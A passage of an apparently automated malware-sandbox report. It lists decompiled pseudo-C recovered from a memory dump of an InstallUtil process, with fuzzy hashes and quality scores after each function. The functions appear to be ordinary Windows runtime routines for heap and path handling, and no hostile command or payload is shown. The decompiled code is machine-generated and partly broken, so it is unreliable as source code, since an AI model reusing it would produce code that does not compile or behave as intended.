                      											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                      											_t55 = _v528;
                      											if(_t75 >= _t83) {
                      												_t83 = _t75;
                      											}
                      										}
                      									}
                      									_t63 = _t63 + 0x14;
                      									_t55 = _t55 - 1;
                      									_v528 = _t55;
                      								} while (_t55 != 0);
                      								_t62 = _v532;
                      							}
                      							if(_t62 !=  &_v524) {
                      								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                      							}
                      							_t76 = _t83 & 0x0000ffff;
                      							_t81 = _t83 >> 0x10;
                      						}
                      						goto L9;
                      					}
                      				}
                      			}




























                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89a68521ca38e4c96aed186652a463e0f0ce98da59bbf8eebbf296dfd567c5ec
                      • Instruction ID: e518f09de00b5fa3297a2cbe1475c5330767859e8ce9bfe2c2db4969c97f6369
                      • Opcode Fuzzy Hash: 89a68521ca38e4c96aed186652a463e0f0ce98da59bbf8eebbf296dfd567c5ec
                      • Instruction Fuzzy Hash: 19415EB5A5022D9BDB24DF59CC88AB9B7F8FB54300F1045EAD919D7252EB709E80CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0138AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                      				intOrPtr _v8;
                      				char _v12;
                      				signed int _v16;
                      				signed char _v20;
                      				intOrPtr _v24;
                      				char* _t37;
                      				void* _t47;
                      				signed char _t51;
                      				void* _t53;
                      				char _t55;
                      				intOrPtr _t57;
                      				signed char _t61;
                      				intOrPtr _t75;
                      				void* _t76;
                      				signed int _t81;
                      				intOrPtr _t82;
                      
                      				_t53 = __ecx;
                      				_t55 = 0;
                      				_v20 = _v20 & 0;
                      				_t75 = __edx;
                      				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                      				_v24 = __edx;
                      				_v12 = 0;
                      				if((_t81 & 0x01000000) != 0) {
                      					L5:
                      					if(_a8 != 0) {
                      						_t81 = _t81 | 0x00000008;
                      					}
                      					_t57 = E0138ABF4(_t55 + _t75, _t81);
                      					_v8 = _t57;
                      					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                      						_t76 = 0;
                      						_v16 = _v16 & 0;
                      					} else {
                      						_t59 = _t53;
                      						_t76 = E0138AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                      						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                      							_t47 = E0138AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                      							_t61 = _v20;
                      							if(_t61 != 0) {
                      								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                      								if(E0136CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                      									L012E77F0(_t53, 0, _t76);
                      									_t76 = 0;
                      								}
                      							}
                      						}
                      					}
                      					_t82 = _v8;
                      					L16:
                      					if(E012E7D50() == 0) {
                      						_t37 = 0x7ffe0380;
                      					} else {
                      						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      					}
                      					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                      						E0138131B(_t53, _t76, _t82, _v16);
                      					}
                      					return _t76;
                      				}
                      				_t51 =  *(__ecx + 0x20);
                      				_v20 = _t51;
                      				if(_t51 == 0) {
                      					goto L5;
                      				}
                      				_t81 = _t81 | 0x00000008;
                      				if(E0136CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                      					_t55 = _v12;
                      					goto L5;
                      				} else {
                      					_t82 = 0;
                      					_t76 = 0;
                      					_v16 = _v16 & 0;
                      					goto L16;
                      				}
                      			}




















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                      • Instruction ID: 194353bf16a688163e04f76785d5bb757ce598c64ba68dc1f106afe9e4d4a2fb
                      • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                      • Instruction Fuzzy Hash: AA310632F003096BEB16AB69C845BBFFBBAEF80214F05846AE905A7651DA74CD00C690
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E0138FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                      				char _v8;
                      				signed int _v12;
                      				signed int _t29;
                      				char* _t32;
                      				char* _t43;
                      				signed int _t80;
                      				signed int* _t84;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t56 = __edx;
                      				_t84 = __ecx;
                      				_t80 = E0138FD4E(__ecx, __edx);
                      				_v12 = _t80;
                      				if(_t80 != 0) {
                      					_t29 =  *__ecx & _t80;
                      					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                      					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                      						E01390A13(__ecx, _t80, 0, _a4);
                      						_t80 = 1;
                      						if(E012E7D50() == 0) {
                      							_t32 = 0x7ffe0380;
                      						} else {
                      							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      						}
                      						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                      							_push(3);
                      							L21:
                      							E01381608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                      						}
                      						goto L22;
                      					}
                      					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                      						_t80 = E01392B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                      						if(_t80 != 0) {
                      							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                      							_t77 = _v8;
                      							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                      								E0138C8F7(_t66, _t77, 0);
                      							}
                      						}
                      					} else {
                      						_t80 = E0138DBD2(__ecx[0xb], _t74, __edx, _a4);
                      					}
                      					if(E012E7D50() == 0) {
                      						_t43 = 0x7ffe0380;
                      					} else {
                      						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      					}
                      					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                      						goto L22;
                      					} else {
                      						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                      						goto L21;
                      					}
                      				} else {
                      					_push(__ecx);
                      					_push(_t80);
                      					E0138A80D(__ecx[0xf], 9, __edx, _t80);
                      					L22:
                      					return _t80;
                      				}
                      			}











                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                      • Instruction ID: 1dc3611c05113f25d1a981841778d36904f10dbc08eaa76cf4ce75552462bace
                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                      • Instruction Fuzzy Hash: 8A31F432300745AFD722AB6CC844F6ABBEDEBC5658F184058E94ACB782DB75EC41C760
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 70%
                      			E0138EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                      				signed int _v8;
                      				char _v12;
                      				intOrPtr _v15;
                      				char _v16;
                      				intOrPtr _v19;
                      				void* _v28;
                      				intOrPtr _v36;
                      				void* __ebx;
                      				void* __edi;
                      				signed char _t26;
                      				signed int _t27;
                      				char* _t40;
                      				unsigned int* _t50;
                      				intOrPtr* _t58;
                      				unsigned int _t59;
                      				char _t75;
                      				signed int _t86;
                      				intOrPtr _t88;
                      				intOrPtr* _t91;
                      
                      				_t75 = __edx;
                      				_t91 = __ecx;
                      				_v12 = __edx;
                      				_t50 = __ecx + 0x30;
                      				_t86 = _a4 & 0x00000001;
                      				if(_t86 == 0) {
                      					E012E2280(_t26, _t50);
                      					_t75 = _v16;
                      				}
                      				_t58 = _t91;
                      				_t27 = E0138E815(_t58, _t75);
                      				_v8 = _t27;
                      				if(_t27 != 0) {
                      					E012CF900(_t91 + 0x34, _t27);
                      					if(_t86 == 0) {
                      						E012DFFB0(_t50, _t86, _t50);
                      					}
                      					_push( *((intOrPtr*)(_t91 + 4)));
                      					_push( *_t91);
                      					_t59 =  *(_v8 + 0x10);
                      					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                      					_push(0x8000);
                      					_t11 = _t53 - 1; // 0x0
                      					_t12 = _t53 - 1; // 0x0
                      					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                      					E0138AFDE( &_v12,  &_v16);
                      					asm("lock xadd [eax], ecx");
                      					asm("lock xadd [eax], ecx");
                      					E0138BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                      					_t55 = _v36;
                      					_t88 = _v36;
                      					if(E012E7D50() == 0) {
                      						_t40 = 0x7ffe0388;
                      					} else {
                      						_t55 = _v19;
                      						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      					}
                      					if( *_t40 != 0) {
                      						E0137FE3F(_t55, _t91, _v15, _t55);
                      					}
                      				} else {
                      					if(_t86 == 0) {
                      						E012DFFB0(_t50, _t86, _t50);
                      						_t75 = _v16;
                      					}
                      					_push(_t58);
                      					_t88 = 0;
                      					_push(0);
                      					E0138A80D(_t91, 8, _t75, 0);
                      				}
                      				return _t88;
                      			}























                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                      • Instruction ID: f6278403326a1034786ea7ab65589acec05c92c82e2a025bcbe0b1ac1d417276
                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                      • Instruction Fuzzy Hash: 8F31D2326147069BD71AEF28CC80A6BB7AAFFC4614F04492DF55687781DE34E805CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E013469A6(signed short* __ecx, void* __eflags) {
                      				signed int _v8;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				signed int _v24;
                      				signed short _v28;
                      				signed int _v32;
                      				intOrPtr _v36;
                      				signed int _v40;
                      				char* _v44;
                      				signed int _v48;
                      				intOrPtr _v52;
                      				signed int _v56;
                      				char _v60;
                      				signed int _v64;
                      				char _v68;
                      				char _v72;
                      				signed short* _v76;
                      				signed int _v80;
                      				char _v84;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t68;
                      				intOrPtr _t73;
                      				signed short* _t74;
                      				void* _t77;
                      				void* _t78;
                      				signed int _t79;
                      				signed int _t80;
                      
                      				_v8 =  *0x13bd360 ^ _t80;
                      				_t75 = 0x100;
                      				_v64 = _v64 & 0x00000000;
                      				_v76 = __ecx;
                      				_t79 = 0;
                      				_t68 = 0;
                      				_v72 = 1;
                      				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                      				_t77 = 0;
                      				if(L012D6C59(__ecx[2], 0x100, __eflags) != 0) {
                      					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                      					if(_t79 != 0 && E01346BA3() != 0) {
                      						_push(0);
                      						_push(0);
                      						_push(0);
                      						_push(0x1f0003);
                      						_push( &_v64);
                      						if(E01309980() >= 0) {
                      							E012E2280(_t56, 0x13b8778);
                      							_t77 = 1;
                      							_t68 = 1;
                      							if( *0x13b8774 == 0) {
                      								asm("cdq");
                      								 *(_t79 + 0xf70) = _v64;
                      								 *(_t79 + 0xf74) = 0x100;
                      								_t75 = 0;
                      								_t73 = 4;
                      								_v60 =  &_v68;
                      								_v52 = _t73;
                      								_v36 = _t73;
                      								_t74 = _v76;
                      								_v44 =  &_v72;
                      								 *0x13b8774 = 1;
                      								_v56 = 0;
                      								_v28 = _t74[2];
                      								_v48 = 0;
                      								_v20 = ( *_t74 & 0x0000ffff) + 2;
                      								_v40 = 0;
                      								_v32 = 0;
                      								_v24 = 0;
                      								_v16 = 0;
                      								if(E012CB6F0(0x12ac338, 0x12ac288, 3,  &_v60) == 0) {
                      									_v80 = _v80 | 0xffffffff;
                      									_push( &_v84);
                      									_push(0);
                      									_push(_v64);
                      									_v84 = 0xfa0a1f00;
                      									E01309520();
                      								}
                      							}
                      						}
                      					}
                      				}
                      				if(_v64 != 0) {
                      					_push(_v64);
                      					E013095D0();
                      					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                      					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                      				}
                      				if(_t77 != 0) {
                      					E012DFFB0(_t68, _t77, 0x13b8778);
                      				}
                      				_pop(_t78);
                      				return E0130B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                      			}

































                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2da49aca25f776d9113dbf0d762bcd9c904f1475fbe5d3de74b65d7ae1c2afa3
                      • Instruction ID: 5467dc552c519f8f98f889fbd93f82af8a6bf37525e59f15532b1adc557492f5
                      • Opcode Fuzzy Hash: 2da49aca25f776d9113dbf0d762bcd9c904f1475fbe5d3de74b65d7ae1c2afa3
                      • Instruction Fuzzy Hash: 2941A3B1D006099FDB15CFA9C941BFEBBF8EF49718F148169E514A7240DB70A905CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E012C5210(intOrPtr _a4, void* _a8) {
                      				void* __ecx;
                      				intOrPtr _t31;
                      				signed int _t32;
                      				signed int _t33;
                      				intOrPtr _t35;
                      				signed int _t52;
                      				void* _t54;
                      				void* _t56;
                      				unsigned int _t59;
                      				signed int _t60;
                      				void* _t61;
                      
                      				_t61 = E012C52A5(1);
                      				if(_t61 == 0) {
                      					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                      					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                      					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                      				} else {
                      					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                      					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                      				}
                      				_t60 = _t59 >> 1;
                      				_t32 = 0x3a;
                      				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                      					_t52 = _t60 + _t60;
                      					if(_a4 > _t52) {
                      						goto L5;
                      					}
                      					if(_t61 != 0) {
                      						asm("lock xadd [esi], eax");
                      						if((_t32 | 0xffffffff) == 0) {
                      							_push( *((intOrPtr*)(_t61 + 4)));
                      							E013095D0();
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                      						}
                      					} else {
                      						E012DEB70(_t54, 0x13b79a0);
                      					}
                      					_t26 = _t52 + 2; // 0xddeeddf0
                      					return _t26;
                      				} else {
                      					_t52 = _t60 + _t60;
                      					if(_a4 < _t52) {
                      						if(_t61 != 0) {
                      							asm("lock xadd [esi], eax");
                      							if((_t32 | 0xffffffff) == 0) {
                      								_push( *((intOrPtr*)(_t61 + 4)));
                      								E013095D0();
                      								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                      							}
                      						} else {
                      							E012DEB70(_t54, 0x13b79a0);
                      						}
                      						return _t52;
                      					}
                      					L5:
                      					_t33 = E0130F3E0(_a8, _t54, _t52);
                      					if(_t61 == 0) {
                      						E012DEB70(_t54, 0x13b79a0);
                      					} else {
                      						asm("lock xadd [esi], eax");
                      						if((_t33 | 0xffffffff) == 0) {
                      							_push( *((intOrPtr*)(_t61 + 4)));
                      							E013095D0();
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                      						}
                      					}
                      					_t35 = _a8;
                      					if(_t60 <= 1) {
                      						L9:
                      						_t60 = _t60 - 1;
                      						 *((short*)(_t52 + _t35 - 2)) = 0;
                      						goto L10;
                      					} else {
                      						_t56 = 0x3a;
                      						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                      							 *((short*)(_t52 + _t35)) = 0;
                      							L10:
                      							return _t60 + _t60;
                      						}
                      						goto L9;
                      					}
                      				}
                      			}















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b32b5bbccb9f2874c047c552db6fb9426c1843b2a3507f595e08012fc0e7dbe
                      • Instruction ID: 803f974093660b6c8edfdc8051a9e6bbb91073911dce2abde44aeb4fe15b9026
                      • Opcode Fuzzy Hash: 8b32b5bbccb9f2874c047c552db6fb9426c1843b2a3507f595e08012fc0e7dbe
                      • Instruction Fuzzy Hash: 3031E531262611DBC72AAB18C881B7A7BE6FF50B68F114619F6590B5E1E760F804C791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E01303D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                      				intOrPtr _v8;
                      				char _v12;
                      				signed short** _t33;
                      				short* _t38;
                      				intOrPtr* _t39;
                      				intOrPtr* _t41;
                      				signed short _t43;
                      				intOrPtr* _t47;
                      				intOrPtr* _t53;
                      				signed short _t57;
                      				intOrPtr _t58;
                      				signed short _t60;
                      				signed short* _t61;
                      
                      				_t47 = __ecx;
                      				_t61 = __edx;
                      				_t60 = ( *__ecx & 0x0000ffff) + 2;
                      				if(_t60 > 0xfffe) {
                      					L22:
                      					return 0xc0000106;
                      				}
                      				if(__edx != 0) {
                      					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                      						L5:
                      						E012D7B60(0, _t61, 0x12a11c4);
                      						_v12 =  *_t47;
                      						_v12 = _v12 + 0xfff8;
                      						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                      						E012D7B60(0xfff8, _t61,  &_v12);
                      						_t33 = _a8;
                      						if(_t33 != 0) {
                      							 *_t33 = _t61;
                      						}
                      						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                      						_t53 = _a12;
                      						if(_t53 != 0) {
                      							_t57 = _t61[2];
                      							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                      							while(_t38 >= _t57) {
                      								if( *_t38 == 0x5c) {
                      									_t41 = _t38 + 2;
                      									if(_t41 == 0) {
                      										break;
                      									}
                      									_t58 = 0;
                      									if( *_t41 == 0) {
                      										L19:
                      										 *_t53 = _t58;
                      										goto L7;
                      									}
                      									 *_t53 = _t41;
                      									goto L7;
                      								}
                      								_t38 = _t38 - 2;
                      							}
                      							_t58 = 0;
                      							goto L19;
                      						} else {
                      							L7:
                      							_t39 = _a16;
                      							if(_t39 != 0) {
                      								 *_t39 = 0;
                      								 *((intOrPtr*)(_t39 + 4)) = 0;
                      								 *((intOrPtr*)(_t39 + 8)) = 0;
                      								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                      							}
                      							return 0;
                      						}
                      					}
                      					_t61 = _a4;
                      					if(_t61 != 0) {
                      						L3:
                      						_t43 = L012E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                      						_t61[2] = _t43;
                      						if(_t43 == 0) {
                      							return 0xc0000017;
                      						}
                      						_t61[1] = _t60;
                      						 *_t61 = 0;
                      						goto L5;
                      					}
                      					goto L22;
                      				}
                      				_t61 = _a4;
                      				if(_t61 == 0) {
                      					return 0xc000000d;
                      				}
                      				goto L3;
                      			}

















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 892e833d6cfd7d559601aca1830408ea98a3b4bf4d68892b99c16f465402625b
                      • Instruction ID: 7d50c06a65385aa89fb58d950ec16e168c5f41b96eae5d00fecdf8fddf27718b
                      • Opcode Fuzzy Hash: 892e833d6cfd7d559601aca1830408ea98a3b4bf4d68892b99c16f465402625b
                      • Instruction Fuzzy Hash: 4B31CB32A01615DFD7268F2EC861A7ABBE9FF85708B05806AE949CB790E730D840C795
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E012FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _t35;
                      				intOrPtr _t39;
                      				intOrPtr _t45;
                      				intOrPtr* _t51;
                      				intOrPtr* _t52;
                      				intOrPtr* _t55;
                      				signed int _t57;
                      				intOrPtr* _t59;
                      				intOrPtr _t68;
                      				intOrPtr* _t77;
                      				void* _t79;
                      				signed int _t80;
                      				intOrPtr _t81;
                      				char* _t82;
                      				void* _t83;
                      
                      				_push(0x24);
                      				_push(0x13a0220);
                      				E0131D08C(__ebx, __edi, __esi);
                      				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                      				_t79 = __ecx;
                      				_t35 =  *0x13b7b9c; // 0x0
                      				_t55 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                      				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                      				if(_t55 == 0) {
                      					_t39 = 0xc0000017;
                      					L11:
                      					return E0131D0D1(_t39);
                      				}
                      				_t68 = 0;
                      				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                      				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                      				_t7 = _t55 + 8; // 0x8
                      				_t57 = 6;
                      				memcpy(_t7, _t79, _t57 << 2);
                      				_t80 = 0xfffffffe;
                      				 *(_t83 - 4) = _t80;
                      				if(0 < 0) {
                      					L14:
                      					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                      					L20:
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                      					_t39 = _t81;
                      					goto L11;
                      				}
                      				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                      					_t81 = 0xc000007b;
                      					goto L20;
                      				}
                      				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                      					_t59 =  *((intOrPtr*)(_t83 + 8));
                      					_t45 =  *_t59;
                      					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                      					 *_t59 = _t45 + 1;
                      					L6:
                      					 *(_t83 - 4) = 1;
                      					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                      					 *(_t83 - 4) = _t80;
                      					if(_t68 < 0) {
                      						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                      						if(_t82 == 0) {
                      							goto L14;
                      						}
                      						asm("btr eax, ecx");
                      						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                      						if( *_t82 != 0) {
                      							 *0x13b7b10 =  *0x13b7b10 - 8;
                      						}
                      						goto L20;
                      					}
                      					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                      					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                      					_t51 =  *0x13b536c; // 0x77575368
                      					if( *_t51 != 0x13b5368) {
                      						_push(3);
                      						asm("int 0x29");
                      						goto L14;
                      					}
                      					 *_t55 = 0x13b5368;
                      					 *((intOrPtr*)(_t55 + 4)) = _t51;
                      					 *_t51 = _t55;
                      					 *0x13b536c = _t55;
                      					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                      					if(_t52 != 0) {
                      						 *_t52 = _t55;
                      					}
                      					_t39 = 0;
                      					goto L11;
                      				}
                      				_t77 =  *((intOrPtr*)(_t83 + 8));
                      				_t68 = E012FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                      				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                      				if(_t68 < 0) {
                      					goto L14;
                      				}
                      				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                      				goto L6;
                      			}



















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e8de319a4d6c526914b3d83ce11926430af9a4ac9b43b4ec02d9ff3dd7d12427
                      • Instruction ID: 437ce3336c046b2c4f34737b1640f4087e10dda67bf825ac264fedeefa9fedf3
                      • Opcode Fuzzy Hash: e8de319a4d6c526914b3d83ce11926430af9a4ac9b43b4ec02d9ff3dd7d12427
                      • Instruction Fuzzy Hash: 98417B75A21205DFDB18CF58C880BA9BBF1FF89708F18806DEA09AB344D774A941CF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E012EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                      				signed int* _v8;
                      				char _v16;
                      				void* __ebx;
                      				void* __edi;
                      				signed char _t33;
                      				signed char _t43;
                      				signed char _t48;
                      				signed char _t62;
                      				void* _t63;
                      				intOrPtr _t69;
                      				intOrPtr _t71;
                      				unsigned int* _t82;
                      				void* _t83;
                      
                      				_t80 = __ecx;
                      				_t82 = __edx;
                      				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                      				_t62 = _t33 >> 0x00000001 & 0x00000001;
                      				if((_t33 & 0x00000001) != 0) {
                      					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                      					if(E012E7D50() != 0) {
                      						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      					} else {
                      						_t43 = 0x7ffe0386;
                      					}
                      					if( *_t43 != 0) {
                      						_t43 = E01398D34(_v8, _t80);
                      					}
                      					E012E2280(_t43, _t82);
                      					if( *((char*)(_t80 + 0xdc)) == 0) {
                      						E012DFFB0(_t62, _t80, _t82);
                      						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                      						_t30 = _t80 + 0xd0; // 0xd0
                      						_t83 = _t30;
                      						E01398833(_t83,  &_v16);
